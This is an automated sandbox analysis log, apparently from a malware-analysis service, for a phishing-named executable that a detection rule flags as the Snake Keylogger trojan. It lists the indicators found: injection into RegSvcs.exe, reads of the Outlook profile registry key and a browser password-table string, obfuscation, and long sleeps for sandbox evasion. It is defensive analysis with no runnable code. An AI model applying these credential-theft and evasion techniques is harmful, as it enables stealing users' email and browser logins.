Source: 00000007.00000002.3731165395.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: z30ProofofPaymentAttached.exe PID: 7304, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: RegSvcs.exe PID: 7712, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 1.2.z30ProofofPaymentAttached.exe.f60000.0.raw.unpack, z---W.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 1.2.z30ProofofPaymentAttached.exe.f60000.0.raw.unpack, z---W.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 1.2.z30ProofofPaymentAttached.exe.f60000.0.raw.unpack, -.cs Cryptographic APIs: 'TransformFinalBlock'
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@3/2@4/4
Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe Code function: 1_2_00FFCE7A GetLastError,FormatMessageW, 1_2_00FFCE7A
Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe Code function: 1_2_00FEAB84 AdjustTokenPrivileges,CloseHandle, 1_2_00FEAB84
Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe Code function: 1_2_00FEB134 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError, 1_2_00FEB134
Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe Code function: 1_2_00FFE1FD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode, 1_2_00FFE1FD
Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe Code function: 1_2_00FF6532 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,__wsplitpath,_wcscat,CloseHandle, 1_2_00FF6532
Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe Code function: 1_2_0100C18C CoInitializeSecurity,_memset,_memset,CoCreateInstanceEx,CoTaskMemFree,CoSetProxyBlanket, 1_2_0100C18C
Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe Code function: 1_2_00FB406B CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource, 1_2_00FB406B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Mutant created: NULL
Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe File created: C:\Users\user~1\AppData\Local\Temp\aut719C.tmp Jump to behavior
Source: z30ProofofPaymentAttached.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: RegSvcs.exe, 00000007.00000002.3733442866.00000000030A2000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3733442866.00000000030B1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3733442866.00000000030E2000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3733442866.0000000003093000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3733442866.00000000030D6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: z30ProofofPaymentAttached.exe ReversingLabs: Detection: 31%
Source: unknown Process created: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe "C:\Users\user\Desktop\z30ProofofPaymentAttached.exe"
Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\z30ProofofPaymentAttached.exe"
Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\z30ProofofPaymentAttached.exe" Jump to behavior
Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe Section loaded: wsock32.dll Jump to behavior
Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Jump to behavior
Source: z30ProofofPaymentAttached.exe Static file information: File size 1073152 > 1048576
Source: z30ProofofPaymentAttached.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: z30ProofofPaymentAttached.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: z30ProofofPaymentAttached.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: z30ProofofPaymentAttached.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: z30ProofofPaymentAttached.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: z30ProofofPaymentAttached.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: z30ProofofPaymentAttached.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: wntdll.pdbUGP source: z30ProofofPaymentAttached.exe, 00000001.00000003.1286744686.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, z30ProofofPaymentAttached.exe, 00000001.00000003.1287142771.0000000003410000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: z30ProofofPaymentAttached.exe, 00000001.00000003.1286744686.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, z30ProofofPaymentAttached.exe, 00000001.00000003.1287142771.0000000003410000.00000004.00001000.00020000.00000000.sdmp
Source: z30ProofofPaymentAttached.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: z30ProofofPaymentAttached.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: z30ProofofPaymentAttached.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: z30ProofofPaymentAttached.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: z30ProofofPaymentAttached.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe Code function: 1_2_00FCE01E LoadLibraryA,GetProcAddress, 1_2_00FCE01E
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe Code function: 1_2_00FD6B05 push ecx; ret 1_2_00FD6B18
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0141A0E8 pushad ; retf 0002h 7_2_0141A0EA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01419089 push ebx; retf 0002h 7_2_0141908A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0141A088 pushad ; retf 0002h 7_2_0141A0EA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01419459 push esi; retf 0002h 7_2_0141945A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01419468 push esi; retf A802h 7_2_0141961A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01418481 push ecx; retf 0002h 7_2_01418482
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01418490 push edx; retf 0002h 7_2_01418EEA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01419611 push edi; retf 0002h 7_2_01419612
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01419DE0 pushad ; retf 0002h 7_2_0141A02A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_067C9243 push es; ret 7_2_067C9244
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe Code function: 1_2_01018111 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed, 1_2_01018111
Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe Code function: 1_2_00FCEB42 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput, 1_2_00FCEB42
Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe Code function: 1_2_00FD123A __initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 1_2_00FD123A
Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Switches to a custom stack to bypass stack traces
Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe API/Special instruction interceptor: Address: A1CB0C
Contains long sleeps (>= 3 min)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 600000 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599875 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599765 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599656 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599546 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599437 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599328 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599219 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599109 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599000 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598890 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598780 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598671 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598562 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598453 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598344 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598219 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598108 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597999 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597890 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597781 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597671 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597562 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597433 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597328 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597218 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597109 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597000 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596890 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596781 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596672 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596562 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596450 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596343 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596234 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596125 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596015 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595906 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595796 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595686 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595578 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595468 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595359 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595249 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595140 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595031 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 594922 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 594812 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 594703 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 594593 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Window / User API: threadDelayed 2160 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Window / User API: threadDelayed 7690 Jump to behavior
Found evaded block containing many API calls
Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe Evaded block: after key decision
Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe Evaded block: after key decision
Found evasive API chain (date check)
Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
Found large amount of non-executed APIs
Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe API coverage: 4.6 %
Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe Code function: 1_2_00FF6CA9 GetFileAttributesW,FindFirstFileW,FindClose, 1_2_00FF6CA9
Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe Code function: 1_2_00FF60DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose, 1_2_00FF60DD
Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe Code function: 1_2_00FF63F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose, 1_2_00FF63F9
Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe Code function: 1_2_00FFEB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose, 1_2_00FFEB60
Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe Code function: 1_2_00FFF5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 1_2_00FFF5FA
Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe Code function: 1_2_00FFF56F FindFirstFileW,FindClose, 1_2_00FFF56F
Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe Code function: 1_2_01001B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 1_2_01001B2F
